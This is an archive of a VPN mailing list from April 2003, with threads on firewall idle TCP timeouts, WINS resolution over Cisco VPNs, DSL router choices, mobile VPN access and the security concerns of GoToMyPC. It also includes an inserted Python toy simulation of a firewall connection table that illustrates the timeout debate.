<3E959BFF.1020305@cipherica.com> James McNeill wrote: > as for TCP sessions, since the keys and algorithms will all be the same > between sessions, it won't have any effect on security. anyone capable of > attacking your VPN tunnel won't care what you do with your TCP sessions. as > far as your attacker is concerned, a TCP session is just a number in the > header, but so long as it uses the same tunnel, he won't care. It's the > contents of the packet that is valuable. Exactly my point - the length of a TCP connection has no effect on the security of the VPN it's being tunneled over. I was responding to the following statement .. safieradam wrote: > I would .... and point out to the developers that leaving sessions > open for hours is bad security and not allowed. .. which was given in the context of ..
Mike Hancock wrote: > ..I keep saying that they need to speed up response times on their > TCP communications and send "heartbeats". They call me "Non-Helpful" .. which in turn implied that 'sessions' in the first quote are TCP sessions. If these were not, then there is nothing to talk about; the issue boils down to proper use of SA lifetimes; case closed. > having abnormally long/short TCP sessions is bad practice, and likely to > cause more problems than it's worth. You make it sound as if it's a commonly accepted fact. Well, it's not. There is nothing wrong with 'abnormally' long/short TCP sessions. Consider SSH, IMAP, PPTP and a multitude of instant messaging protocols as a few examples. /alex From j.archbold at napier.ac.uk Fri Apr 11 05:27:17 2003 From: j.archbold at napier.ac.uk (James Archbold) Date: Fri, 11 Apr 2003 10:27:17 +0100 Subject: [VPN] Unable to see windows domain information (WINS) using VPN Message-ID: <3E968A75.2B51E5E3@napier.ac.uk> I cannot get any WINS resolution through my Cisco VPN 3000 Concentrator. I connect to my ISP then to the VPN 3000. I can successfully establish a tunnel and can resolve names using DNS but I cannot resolve any NetBIOS names from my WINS servers. The VPN box is connected to the DMZ of a PIX firewall. I can ping the WINS servers and all IP routing is working. I am using the Cisco VPN Client 3.6.3a. Below is an ipconfig /all before and after the VPN connection is established. My IP address through the VPN is allocated from an IP pool on a RADIUS server and my WINS configuration is also set up from the RADIUS server. (RADIUS server is Cisco ACS 3.1)

Before VPN connection:

    Windows IP Configuration
       Host Name . . . . . . . . . . . . : host
       Primary Dns Suffix  . . . . . . . : domain.napier.ac.uk
       Node Type . . . . . . . . . . . . : Hybrid
       IP Routing Enabled. . . . . . . . : Yes
       WINS Proxy Enabled. . . . . . . . : No
       DNS Suffix Search List. . . . . . : napier.ac.uk

    PPP adapter ISP:
       Connection-specific DNS Suffix  . :
       Description . . . . . . . . . . . : WAN (PPP/SLIP) Interface
       Physical Address. . . . . . . . . : 00-XX-XX-XX-XX-XX
       Dhcp Enabled. . . . . . . . . . . : No
       IP Address. . . . . . . . . . . . : 80.225.182.70
       Subnet Mask . . . . . . . . . . . : 255.255.255.255
       Default Gateway . . . . . . . . . : 80.225.182.70
       DNS Servers . . . . . . . . . . . : 80.225.251.50
                                           80.225.252.58
       NetBIOS over Tcpip. . . . . . . . : Disabled

After connection to VPN:

    Windows IP Configuration
       Host Name . . . . . . . . . . . . : host
       Primary Dns Suffix  . . . . . . . : domain.napier.ac.uk
       Node Type . . . . . . . . . . . . : Hybrid
       IP Routing Enabled. . . . . . . . : Yes
       WINS Proxy Enabled. . . . . . . . : No
       DNS Suffix Search List. . . . . . : napier.ac.uk
                                           napier.ac.uk

    PPP adapter ISP:
       Connection-specific DNS Suffix  . :
       Description . . . . . . . . . . . : WAN (PPP/SLIP) Interface
       Physical Address. . . . . . . . . : 00-53-45-00-00-00
       Dhcp Enabled. . . . . . . . . . . : No
       IP Address. . . . . . . . . . . . : 80.225.182.70
       Subnet Mask . . . . . . . . . . . : 255.255.255.255
       Default Gateway . . . . . . . . . : 80.225.182.70
       DNS Servers . . . . . . . . . . . : 146.176.1.5
                                           146.176.2.5
       Primary WINS Server . . . . . . . : 146.176.a.xxx
       Secondary WINS Server . . . . . . : 146.176.b.yyy
       NetBIOS over Tcpip. . . . . . . . : Disabled

Any ideas? From seth.robinson at maine.edu Fri Apr 11 14:14:32 2003 From: seth.robinson at maine.edu (Seth Robinson) Date: Fri, 11 Apr 2003 14:14:32 -0400 Subject: [VPN] UPnP over Sonicwall VPN Message-ID: Hey Guys, I was having a Messenger problem a while back, and was told to open up some ports, and to also allow SIP through my firewall (SonicWALL). I did this, and it still didn't work. I did a little more research and found out quite a bit of interesting info. First off, we were trying to do A/V conferencing through Windows Messenger. We were using WM 4.6, but then upgraded to WM 4.7. We have our own IM server. Apparently 4.7 is the first version to make use of UPnP, universal plug and play.
Basically what this does is dynamically assign UDP ports 5004 to 65535 for everything from A/V conversations to whiteboard sharing, thereby allowing it to connect without having to worry about what ports are already in use. Herein lies the problem. SonicWALL is not UPnP compatible. It does not recognize what Messenger is trying to do, and doesn't know what ports are trying to be used, and instead blocks it. My question is, since it is possible to get UPnP-compatible routers, would it possibly work to set one up behind the SonicWALL, have all nodes on that LAN use it as their gateway, and then set the router's gateway to be the SonicWALL, do the same thing for the other side of the VPN, and then open up all ports between those two IP addresses, and leave everything else closed? Sorry to be so long-winded, but please tell me what your thoughts are... Thanks a ton, Seth R. From jperry at cccil.org Fri Apr 11 16:56:49 2003 From: jperry at cccil.org (Jill Perry) Date: Fri, 11 Apr 2003 13:56:49 -0700 Subject: [VPN] Which DSL router? Message-ID: <001101c3006c$df8eede0$6901a8c0@CCCIL> Our office wants to implement VPN in the near future. We have 2 offices with a server and DSL router in each, and several satellite offices with one computer with a dial-up connection. I've researched DSL routers with VPN firewall, and have a list of models that I think, from what I've read, will meet our needs. All offer stateful packet inspection and 3DES, multiple simultaneous VPN tunnels, and are fairly inexpensive. What I don't know is how easy the installation is, what changes may be needed in our current network setups, if any other software is needed (all computers are on Win2000), and are there other things we should be thinking about? Here are the models:

    NetGear FVS318
    Linksys BEFVP41
    D-Link DI-804V
    Barricade Plus SMC7004FW
    ZyXEL Prestige 652

Can any of you give us information that will help us decide which would work best for us?
Have any of you used one of these successfully in a similar situation? Thanks for your help. Jill From tbird at precision-guesswork.com Fri Apr 11 17:29:17 2003 From: tbird at precision-guesswork.com (Tina Bird) Date: Fri, 11 Apr 2003 21:29:17 +0000 (GMT) Subject: [VPN] WINS/browsing etc. Message-ID: <20030411212807.W72889-100000@sisyphus.iocaine.com> Hi all -- You'll have noticed we've had several "help can't see shares" messages today. If someone would please do me the favor of writing the definitive answer to these questions, I will gleefully put it on the VPN site so we don't have to keep repeating it -- I'd do it myself but I'm up to my earlobes in doc for work. thanks much -- tbird -- don't worry please please how many times do I have to say it there's no way not to be who you are and where -- Ikkyu http://www.shmoo.com/~tbird Log Analysis http://www.loganalysis.org VPN http://vpn.shmoo.com From djdawso at qwest.com Fri Apr 11 18:45:42 2003 From: djdawso at qwest.com (Dana J. Dawson) Date: Fri, 11 Apr 2003 17:45:42 -0500 Subject: [VPN] Application timeouts over VPN...HELP! References: <792DE28E91F6EA42B4663AE761C41C2AEA0B@cliff.bai.org> <3E947EF4.8080701@cipherica.com> <002d01c2ff29$2d39cd20$0f00a8c0@james> <3E959BFF.1020305@cipherica.com> Message-ID: <3E974596.8040500@qwest.com> > You make it sound as it's a commonly accepted fact . Well, it's not. > There is nothing wrong with 'abnormally' Long/short TCP sessions. > Consider SSH, IMAP, PPTP and multitude of instant messaging protocols > as few examples.
There may be nothing wrong with "abnormally long" TCP sessions from a TCP or a security standpoint (I'm ignoring the concept of an "abnormally short" TCP session, since I don't believe such a thing exists), but when devices that track the states of those sessions are involved, such as firewalls, then there are very real issues that could be considered problems. Such devices have to allocate resources for each connection, so they must impose an idle timeout of some sort or risk eventual failure due to lack of resources. The fact that firewalls are as common as they are today implies to me that it is now, indeed, bad practice for a developer to assume that a TCP session can be left idle for an arbitrary length of time. Similarly, I think it's also bad practice for a firewall administrator to impose an excessively short timeout period for idle sessions. What are reasonable times? That's obviously open to individual opinion, but more extreme time periods will elicit more universal agreement. For example, I doubt anyone would think a one year idle timeout is reasonable, nor that a ten second timeout is reasonable. The most common timeouts I encounter are in the range of half an hour up to a small number of hours (usually less than 8). Within that range there is still room for much debate. I believe the original post in this topic referred to a 65 second timeout, which I think is unreasonably short. However, I also think that it's not reasonable to assume that an idle TCP session should always survive for several (perhaps even just a few) hours, and that developers should avoid such situations by either closing a connection when it's not "immediately" needed (whatever that means), by using a keepalive and/or recovery mechanism, or by using a connectionless protocol such as UDP.

Dana

--
Dana J. Dawson djdawso at qwest.com
Senior Staff Engineer CCIE #1937
Qwest Communications (612) 664-3364
600 Stinson Blvd., Suite 1S (612) 664-4779 (FAX)
Minneapolis MN 55413-2620
"Hard is where the money is."

From osmond at holburn.com Fri Apr 11 22:44:49 2003
From: osmond at holburn.com (Chad Osmond)
Date: Fri, 11 Apr 2003 22:44:49 -0400
Subject: [VPN] Which DSL router?
References: <001101c3006c$df8eede0$6901a8c0@CCCIL>
Message-ID: <004301c3009d$7e2dc4a0$1902a8c0@Polk>

>Linksys BEFVP41
>D-Link DI-804V

Tried both, both are sitting in a pile on my desk. I'm a Netscreen fan, after countless hours wasted on cheaper products I went with the Netscreen 5's. If you save $400 on hardware costs you're going to lose it in setup, I spent countless hours configuring, testing, finding bugs, and calling tech support, it's just not worth it. Check E-bay for a 5XP (Or order new) and add a 10 pack of Netscreen remote. Take my advice for what it is, if you need a solution that is easy, compatible, works and is secure spend the $$ on Netscreen. Just a thought, Chad

----- Original Message ----- From: Jill Perry To: vpn at lists.shmoo.com Sent: Friday, April 11, 2003 4:56 PM Subject: [VPN] Which DSL router? Our office wants to implement VPN in the near future. We have 2 offices with a server and DSL router in each, and several satellite offices with one computer with a dial-up connection. I've researched DSL routers with VPN firewall, and have a list of models that I think, from what I've read, will meet our needs. All offer stateful packet inspection and 3DES, multiple simultaneous VPN tunnels, and are fairly inexpensive. What I don't know is how easy the installation is, what changes may be needed in our current network setups, if any other software is needed (all computers are on Win2000), and are there other things we should be thinking about?
Here are the models: NetGear FVS318 Linksys BEFVP41 D-Link DI-804V Barricade Plus SMC7004FW ZyXEL Prestige 652 Can any of you give us information that will help us decide which would work best for us? Have any of you used one of these successfully in a similar situation? Thanks for your help. Jill

From osmond at holburn.com Fri Apr 11 22:49:05 2003
From: osmond at holburn.com (Chad Osmond)
Date: Fri, 11 Apr 2003 22:49:05 -0400
Subject: [VPN] Cannot find domain controller
References:
Message-ID: <005501c3009e$161d5640$1902a8c0@Polk>

LMHosts? Give it a try, usually works wonders for me. Aside from that, I'm not sure what to suggest. If you're on 2K/XP machines you can attempt to browse the shares by IP address, rule out any of the naming gremlins. eg. \\192.168.12.2\data HTH Chad

----- Original Message ----- From: Russell Sakne To: vpn at lists.shmoo.com Sent: Thursday, April 10, 2003 12:23 PM Subject: [VPN] Cannot find domain controller Hi all, I hope you can help. Having followed the advice of the very helpful people on this list, we had our remote site with its PIX-to-PIX VPN working fine, using WINS to find network resources here at home base. Then "something happened" and the remote machines can no longer find any domain controllers for our domain. They can connect to other servers (including our Terminal Services machine and our web proxy), but the primary machines they *need* to connect to are a PDC and a BDC and they can't see them at all. Weirdly, a "find" on the other BDC *does* get a result, which suggests they should be able to approach that machine for authentication. I've checked their DNS settings haven't changed, and "ping" tests resolve the correct IP addresses (though we've never been able to get an ICMP packet through either PIX in any circumstances...).
We wondered if the machine accounts down there had somehow managed to expire, so have deleted them from the Domain and then both attempted to create them at a workstation rename-rejoin and manually to allow the workstation to reconnect as that name, to no avail. Can anyone offer any clues or informed speculation as to what might have gone wrong? We're wondering about the nature of an NT4 "Where's a DC" call. Is there some setting on the VPN that would refuse passage to such a multicast-thing which we may have inadvertently set? Hopefully yours RussellS

From dr_t1mel0rd at hotmail.com Fri Apr 11 23:00:01 2003
From: dr_t1mel0rd at hotmail.com (Dr T1meL0rD)
Date: Fri, 11 Apr 2003 23:00:01 -0400
Subject: [VPN] Application timeouts over VPN...HELP!
Message-ID:

Please define "abnormally long"... Yes, backups over a network connection, some SSH sessions (for SAs, DBAs, etc.), database instance backups, etc, usually require "longer than normal" timeouts, sometimes several hours in the case of backups. HOWEVER, these connections should be the extreme exception, rather than the rule. Situations like this have resulted in verbal sparring with some of my clientele and their administrative staff, but I NEVER allow it to compromise the security of a system that they are paying me good money to protect. I have walked out of meetings because some requests were so over-the-top.
Typically, I will run a TCP connection up to 5 minutes, and it seems to work well, except in some of the occasions I mentioned above. Getting to know your customer's system is key. Cutting through the BS is usually a tougher nut, but is essential in trying to determine what _is_ necessary. Using UDP to circumvent the state issue will create more work for the developers in that more error-checking and -handling code is necessary. I definitely agree with Dana in that developers need to be a bit more judicious with the amount of time they allow connections to remain open. The less security savvy (usually the ones who roll their eyes and begin complaining when they hear a firewall is going to be implemented) typically are sloppier about maintaining state in the application, which is usually a prime reason _the_firewall_ is blamed for "breaking their application." IT managers with sufficient clue will suspect this to be the case. BTW, however heavily I may use it in brief contact with individuals on a professional basis, I have never seen instant messaging as a requirement for a long time-out through a firewall on a production system. If you are putting a firewall only at the border with these requirements, I would certainly recommend defense-in-depth...

From alex at cipherica.com Sun Apr 13 04:14:31 2003
From: alex at cipherica.com (Alex Pankratov)
Date: Sun, 13 Apr 2003 01:14:31 -0700
Subject: [VPN] Application timeouts over VPN...HELP!
In-Reply-To: <3E974596.8040500@qwest.com>
References: <792DE28E91F6EA42B4663AE761C41C2AEA0B@cliff.bai.org> <3E947EF4.8080701@cipherica.com> <002d01c2ff29$2d39cd20$0f00a8c0@james> <3E959BFF.1020305@cipherica.com> <3E974596.8040500@qwest.com>
Message-ID: <3E991C67.2090503@cipherica.com>

Dana J. Dawson wrote:
> > You make it sound as it's a commonly accepted fact. Well, it's not.
> > There is nothing wrong with 'abnormally' Long/short TCP sessions.
> > Consider SSH, IMAP, PPTP and multitude of instant messaging protocols
> > as few examples.
>
> There may be nothing wrong with "abnormally long" TCP sessions from a
> TCP or a security standpoint (I'm ignoring the concept of an "abnormally
> short" TCP session, since I don't believe such a thing exists), but when
> devices that track the states of those sessions are involved, such as
> firewalls, then there are very real issues that could be considered
> problems. Such devices have to allocate resources for each connection,
> so they must impose an idle timeout of some sort or risk eventual
> failure due to lack of resources.

Not really. Timing out idle connections is neither necessary nor sufficient to resolve and/or prevent resource exhaustion. If the firewall does encounter the lack of resources it'd be more reasonable to drop the least recently active connection, but timing it out 'preventively' serves no clear purpose. Idle TCP timeouts are more of a functional feature than an implementation caveat.

From hakan.palm at generic.se Sun Apr 13 08:44:00 2003
From: hakan.palm at generic.se (hakan.palm at generic.se)
Date: Sun, 13 Apr 2003 14:44:00 +0200
Subject: Ang: Re: [VPN] VPN help
Message-ID:

Certicom's movianVPN client, www.certicom.com/products/movian/movianvpn.html, can be used to connect to e.g. Cisco VPN 3000 and runs on PalmOS, Pocket PC and Symbian. They also have a FIPS-140-2 compliant client for PalmOS and Pocket PC. Might be worth looking at... HTH, /Palm

safieradam at hotmail.com 2003-04-11 23:19 To: aquamjb at mac.com @ INTERNET, vpn at lists.shmoo.com @ INTERNET Cc: (Blank: Hakan Palm/Generic) Subject: Re: [VPN] VPN help From what I can tell the danger.com service is offering the e-mail and other data services. That means they control encryption from their server to your hiptop PDA.
You will need to work with them on whether the info is encrypted over the wireless link and the security of their e-mail servers. Probably won't pass security policy muster and VPN is probably NOT your solution if you use them for more than an IP link provider. If they can simply provide a web link to your company site you might be able to put up a VPN solution but it will probably take some custom coding on the client side. I would look at more commonly available existing PDA solutions. V-one (www.v-one.com) makes a proprietary VPN and claims to have a PDA client. They may be able to modify it to work with the Hiptop device, for a price or volume deal and they are small enough to talk to and consider a new service provider as a partner. They also did work with some government groups a while back so they may already have classification levels worked out. Some government security policies forbid certain data going over the Internet even via VPN so check into that first. This is a proprietary OS (See FAQ) so you may need to work with the service vendor directly to find developers working on what you want. Adam Safier

----- Original Message ----- From: "Michael Burns" To: Sent: Tuesday, April 08, 2003 12:41 PM Subject: [VPN] VPN help > Hi, > > Am looking into to find information to see if there is VPN for the > T-Mobile Sidekick (wireless mobile pager, more in Danger.com). Reason > to have the VPN is that I could use to communicate with my engineers > within the division both in and out of campus. Am deaf and am usually > working with highly sensitive projects which would require me to have > secure access to my email or to corporate website. This VPN would > greatly help lot if there is a way to use in the mobile wireless pager > like the Sidekick. > > Thanks and hope there is info that would apply to this wireless pager. > Or you might know one who could help me out? Or can contact the > Danger.com group to see what would work.
> > Michael Burns >

From jim.atherton at netifice.com Tue Apr 15 11:58:01 2003
From: jim.atherton at netifice.com (Jim Atherton)
Date: Tue, 15 Apr 2003 08:58:01 -0700
Subject: [VPN] IPSEC or PPTP over Nextel Packetstream Gold
Message-ID:

I need a mobile connectivity solution that supports either (I would like both and prefer IPSEC) IPSEC (Specifically Cisco VPN client 3.5.x or later) or PPTP (via Windows 2000 native PPTP). I need to connect to a Cisco VPN 3000 hardware client. I looked into this last year and actually tested with Nextel and neither worked and the guys at Nextel didn't know why. I ran across an old mail archive here that said that the compression used by Nextel Packetstream Gold used a compression technology that precluded use of IPSEC and that this would change sometime in the last quarter of 2002. Does anyone have any info about the current or near term status of this product? My company sells a set of VPN products and services and a useful mobile wireless VPN solution is needed. Before Ricochet crashed we did some stuff with them. But since then we have had no wireless mobile solution. If there are any other cost effective mobile wireless solutions out there I would like to know. Personally, I need connectivity via my laptop and I can accept speeds of around 28.8 (true speed) but would like higher speeds. Lower, more expensive solutions are not currently acceptable. I cannot for instance use some sort of high speed satellite connection due to cost. Thanks for any info.
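The state-table argument in the "Application timeouts over VPN" thread above (Dana: a device tracking per-connection state must bound idle time or exhaust its table; Alex: evict the least recently active entry only when the table is actually full) can be played out on a toy connection table. This is an added illustration, not code from any list member; the capacity of 100 entries, the 65-second timeout the thread mentions, the addresses and the one-new-flow-per-second workload are all constructed assumptions.

```python
"""Toy model of a stateful firewall's connection table (constructed example)."""
from collections import OrderedDict
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass(frozen=True)
class Flow:
    src: str
    sport: int
    dst: str
    dport: int


class StateTable:
    """Fixed-capacity table with an optional idle timeout and optional LRU eviction."""

    def __init__(self, capacity: int, idle_timeout: Optional[float], lru_on_full: bool) -> None:
        self.capacity = capacity
        self.idle_timeout = idle_timeout      # None: idle entries are never aged out
        self.lru_on_full = lru_on_full        # True: evict least recently active when full
        self._entries: "OrderedDict[Flow, float]" = OrderedDict()  # flow -> last seen, oldest first
        self.new_refused = 0    # new connections refused because the table was full
        self.live_evicted = 0   # tracked connections thrown out to make room
        self.idle_expired = 0   # entries removed by the idle timer
        self.stale_dropped = 0  # mid-stream packets for connections no longer tracked

    def _expire(self, now: float) -> None:
        if self.idle_timeout is None:
            return
        while self._entries:
            _flow, last_seen = next(iter(self._entries.items()))
            if now - last_seen <= self.idle_timeout:
                break               # oldest first, so every later entry is fresher
            self._entries.popitem(last=False)
            self.idle_expired += 1

    def packet(self, flow: Flow, now: float, syn: bool = False) -> bool:
        """Handle one packet seen at time `now`; return True if it is forwarded."""
        self._expire(now)
        if flow in self._entries:
            self._entries[flow] = now
            self._entries.move_to_end(flow)
            return True
        if not syn:
            # No state for a mid-stream packet: the application sees this as
            # "the firewall broke my connection".
            self.stale_dropped += 1
            return False
        if len(self._entries) >= self.capacity:
            if not self.lru_on_full:
                self.new_refused += 1
                return False
            self._entries.popitem(last=False)   # Alex's alternative: drop the LRU entry
            self.live_evicted += 1
        self._entries[flow] = now
        return True

    def __len__(self) -> int:
        return len(self._entries)


def run_scenario(idle_timeout: Optional[float], lru_on_full: bool,
                 keepalive: Optional[int] = None, capacity: int = 100,
                 seconds: int = 600) -> Dict[str, object]:
    """Constructed workload: one SSH session that goes quiet at t=0, plus one new
    short web flow every second that is never refreshed. At t=seconds+1 the SSH
    session finally sends data. With `keepalive` set, the session instead sends
    a packet every that many seconds (Dana's keepalive suggestion)."""
    table = StateTable(capacity, idle_timeout, lru_on_full)
    ssh = Flow("10.0.0.5", 40000, "10.1.0.9", 22)
    table.packet(ssh, 0.0, syn=True)
    for t in range(1, seconds + 1):
        table.packet(Flow("10.0.0.7", 10000 + t, "192.0.2.1", 80), float(t), syn=True)
        if keepalive and t % keepalive == 0:
            table.packet(ssh, float(t))
    alive = table.packet(ssh, float(seconds + 1))
    return {"ssh_alive": alive, "new_refused": table.new_refused,
            "live_evicted": table.live_evicted, "idle_expired": table.idle_expired,
            "stale_dropped": table.stale_dropped, "table_size": len(table)}


if __name__ == "__main__":
    for label, args in [("no timeout, refuse new flows when full", (None, False)),
                        ("no timeout, LRU eviction when full", (None, True)),
                        ("65 s idle timeout, silent SSH", (65, False)),
                        ("65 s idle timeout, 60 s keepalive", (65, False, 60)),
                        ("65 s idle timeout, 70 s keepalive", (65, False, 70))]:
        print(f"{label}: {run_scenario(*args)}")
```

Without a timeout the table either refuses every new connection once full or, with LRU eviction, silently discards the idle session under churn anyway; with the 65 s timeout the session survives only if its keepalive interval is shorter than the timeout.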
From hakan.palm at generic.se Tue Apr 15 17:08:21 2003
From: hakan.palm at generic.se (hakan.palm at generic.se)
Date: Tue, 15 Apr 2003 23:08:21 +0200
Subject: Ang: [VPN] IPSEC or PPTP over Nextel Packetstream Gold
Message-ID:

Jim, are you trying to connect to a Cisco VPN 3002 Hardware Client with another client? If so, the simple answer is as far as I know, no you can not terminate the VPN tunnel from another client like the Cisco VPN Client at the VPN 3002. Simply because the Cisco VPN 3002 is a hardware client and not a concentrator. For a mobile solution the VPN 3000 Concentrator range is IMNHO really nice to work with and well suited. You can use the Cisco VPN Client on a laptop running all but the archaic versions of Windows, Mac OS X, Linux... There is 3rd party support for older Mac OS, Symbian, Pocket PC and PalmOS. HTH Regards, /Palm

jim.atherton at netifice.com 2003-04-15 20:35 To: vpn at lists.shmoo.com @ INTERNET Cc: (Blank: Hakan Palm/Generic) Subject: [VPN] IPSEC or PPTP over Nextel Packetstream Gold I need a mobile connectivity solution that supports either (I would like both and prefer IPSEC) IPSEC (Specifically Cisco VPN client 3.5.x or later) or PPTP (via Windows 2000 native PPTP). I need to connect to a Cisco VPN 3000 hardware client. I looked into this last year and actually tested with Nextel and neither worked and the guys at Nextel didn't know why. I ran across an old mail archive here that said that the compression used by Nextel Packetstream Gold used a compression technology that precluded use of IPSEC and that this would change sometime in the last quarter of 2002. Does anyone have any info about the current or near term status of this product? My company sells a set of VPN products and services and a useful mobile wireless VPN solution is needed. Before Ricochet crashed we did some stuff with them. But since then we have had no wireless mobile solution.
If there are any other cost effective mobile wireless solutions out there I would like to know. Personally, I need connectivity via my laptop and I can accept speeds of around 28.8 (true speed) but would like higher speeds. Lower, more expensive solutions are not currently acceptable. I cannot for instance use some sort of high speed satellite connection due to cost. Thanks for any info.

From jim.atherton at netifice.com Tue Apr 15 17:18:55 2003
From: jim.atherton at netifice.com (Jim Atherton)
Date: Tue, 15 Apr 2003 14:18:55 -0700
Subject: [VPN] IPSEC or PPTP over Nextel Packetstream Gold
Message-ID:

Guess I need to be a little more clear. We use the VPN 3000 concentrator. I have a laptop. I need to connect to my work environment with my laptop over some mobile (moving) method. I have the VPN 3000 software client on my PC and Windows 2000 PPTP (which the VPN 3000 also will allow as a client). I have a Nextel phone. I noticed that Nextel has a mobile connectivity solution (Packetstream gold) and tried about 6 months ago to make it work. It didn't. There is an old thread somewhere on this server that states that Motorola's compression hardware used by Nextel did not support IPSEC compression (this was during the summer of 2002) but that it would in late 2002. I am trying to find info about whether or not it does now (Nextel has no clue and no one at Nextel (that I can reach) knows anything about the technical details of this product Packetstream Gold). Also would accept alternative cost effective methods (have to approach at least 28.8 speeds). This is an interesting area that no one seems to have a clue about. Since my company resells various VPN solutions nationwide, I have a feeling at least of the potential for this as a product and am a little surprised that no one has filled this gap.
-----Original Message----- From: hakan.palm at generic.se [mailto:hakan.palm at generic.se] Sent: Tuesday, April 15, 2003 5:08 PM To: jim.atherton at netifice.com Cc: vpn at lists.shmoo.com Subject: Ang: [VPN] IPSEC or PPTP over Nextel Packetstream Gold Jim, are you trying to connect to a Cisco VPN 3002 Hardware Client with another client? If so, the simple answer is as far as I know, no you can not terminate the VPN tunnel from another client like the Cisco VPN Client at the VPN 3002. Simply because the Cisco VPN 3002 is a hardware client and not a concentrator. For a mobile solution the VPN 3000 Concentrator range is IMNHO really nice to work with and well suited. You can use the Cisco VPN Client on a laptop running all but the archaic versions of Windows, Mac OS X, Linux... There is 3rd party support for older Mac OS, Symbian, Pocket PC and PalmOS. HTH Regards, /Palm jim.atherton at netifice.com 2003-04-15 20:35 To: vpn at lists.shmoo.com @ INTERNET Cc: (Blank: Hakan Palm/Generic) Subject: [VPN] IPSEC or PPTP over Nextel Packetstream Gold I need a mobile connectivity solution that supports either (I would like both and prefer IPSEC) IPSEC (Specifically Cisco VPN client 3.5.x or later) or PPTP (via Windows 2000 native PPTP). I need to connect to a Cisco VPN 3000 hardware client. I looked into this last year and actually tested with Nextel and neither worked and the guys at Nextel didn't know why. I ran across an old mail archive here that said that the compression used by Nextel Packetstream Gold used a compression technology that precluded use of IPSEC and that this would change sometime in the last quarter of 2002. Does anyone have any info about the current or near term status of this product? My company sells a set of VPN products and services and a useful mobile wireless VPN solution is needed. Before Ricochet crashed we did some stuff with them. But since then we have had no wireless mobile solution.
If there are any other cost effective mobile wireless solutions out there I would like to know. Personally, I need connectivity via my laptop and I can accept speeds of around 28.8 (true speed) but would like higher speeds. Lower, more expensive solutions are not currently acceptable. I cannot for instance use some sort of high speed satellite connection due to cost. Thanks for any info.

From derricko at dwightcav.com Wed Apr 16 10:55:52 2003
From: derricko at dwightcav.com (derricko at dwightcav.com)
Date: Wed, 16 Apr 2003 15:55:52 +0100
Subject: [VPN] vpn on a lan running win98se
Message-ID: <002201c30428$46fa0820$1400a8c0@DERRICKO>

We have a small LAN at work which is peer-to-peer, running win98se, proxy server software to ADSL. Is it possible to make our 'fileserver' act as a server so the chairman can log on remotely as if he was in his office? If so what software do you suggest? regards Derrick

From safieradam at hotmail.com Wed Apr 16 10:32:01 2003
From: safieradam at hotmail.com (safieradam)
Date: Wed, 16 Apr 2003 10:32:01 -0400
Subject: [VPN] VPN help
References:
Message-ID:

I wonder if this service would work on a PDA set up for browsing the internet. The client is a Java applet downloaded from the gateway and they have a "wireless" version..... https://www.gotomypc.com Adam Safier

----- Original Message ----- From: To: Cc: ; Sent: Sunday, April 13, 2003 8:44 AM Subject: Ang: Re: [VPN] VPN help Certicom's movianVPN client, www.certicom.com/products/movian/movianvpn.html, can be used to connect to e.g. Cisco VPN 3000 and runs on PalmOS, Pocket PC and Symbian. They also have a FIPS-140-2 compliant client for PalmOS and Pocket PC. Might be worth looking at...
HTH, /Palm

From safieradam at hotmail.com Wed Apr 16 12:10:55 2003
From: safieradam at hotmail.com (safieradam)
Date: Wed, 16 Apr 2003 12:10:55 -0400
Subject: [VPN] Clientless VPN
Message-ID:

I'm raising the specter of clientless VPN again because I came across this service which seems to meet the requirements: I do consider this a form of VPN. They may only be transmitting the screen image, essentially pcAnywhere like, but the functionality of getting the work done is there. They download the client as a java app so the user does not need to do special installation. Instead, it keeps polling a service server so the initial connection is outbound. Despite my security issues with it this is very attractive. Even has PDA, Mac and Unix support.... https://www.gotomypc.com

Security issues:

Password user authentication only. I assume this will change as the service evolves. On the positive side, they do seem to use digital signatures on the target - " multiple passwords, including an access code that resides on the host computer and is never transmitted or stored on GoToMyPC servers ".

They advertise/encourage using Kiosk PC's for the client. If you are using someone else's PC you cannot be sure key-stroke/screen/memory logging is not going on so your personal passwords could be captured. A PC/PDA you control is better as long as you didn't execute some malware along the line.

- You trust the service / software. You are downloading their Java applet, which could change anytime. You are essentially trusting them to encrypt the link from the client to the host and not peek. Well, the company trusts the VPN admin for the company VPN so if you have a contract with GoTo... That is what security is all about - who do you trust and for what?

- Can bypass firewall. At least our firewall policy needs review and this could be a headache. Both the client and the "target" initiate outbound connections to a third party service.
If your company policy allows outbound surfing to just about any address your users could set this up to or from their office PC without your knowledge. You may need to implement IP and DNS name filtering for outbound traffic. That will only work if GoToMyPC play nice and don't get into rotating names and addresses or sell the server part to companies that use their own IP addresses to set up a corporate service. URL content filtering on outbound traffic might work.

- Does the phrase below mean that if your policy is to disable all downloading on the users PC GoToMyPC launch their own program that ignores the browser and downloads and runs a Java app? " For a user who connects to the host computer via a client with a Mac or Unix operating system (or from a Windows-based client that does not accept downloadable files), the Java-enabled Universal Viewer launches automatically. There is nothing the user needs to do to select the appropriate Viewer - our technology will automatically detect the client computer's operating system and launch the appropriate Viewer. "

Any other holes I missed? I see a review of many companies policies coming up. Adam Safier

From jmondaca at entelsa.entelnet.bo Wed Apr 16 14:38:21 2003
From: jmondaca at entelsa.entelnet.bo (jmondaca at entelsa.entelnet.bo)
Date: Wed, 16 Apr 2003 14:38:21 -0400
Subject: [VPN] Multiple VPN connections PIX
Message-ID:

Is there any way to configure multiple simultaneous VPN connections only using cisco PIX? If not what other solutions are available? Regards,
_______________________________________
Jorge Mondaca
Gerencia Seguridad Corporativa
(591) 2-2313030 ext 2021
(591) 72029832

From jac_des_vert at yahoo.com Wed Apr 16 15:49:44 2003
From: jac_des_vert at yahoo.com (Jac)
Date: Wed, 16 Apr 2003 12:49:44 -0700 (PDT)
Subject: [VPN] IPSEC or PPTP over Nextel Packetstream Gold
In-Reply-To:
Message-ID: <20030416194944.82384.qmail@web14101.mail.yahoo.com>

Are you stuck with the VPN 3000?
My understanding is Nextel is currently testing the Nortel Contivity platform for their mobile VPN offering. Should be available in Q4. I know they have a wireless IPSec client that may give you the solution you need. Maybe you can ask about that and see what they are offering. Jac

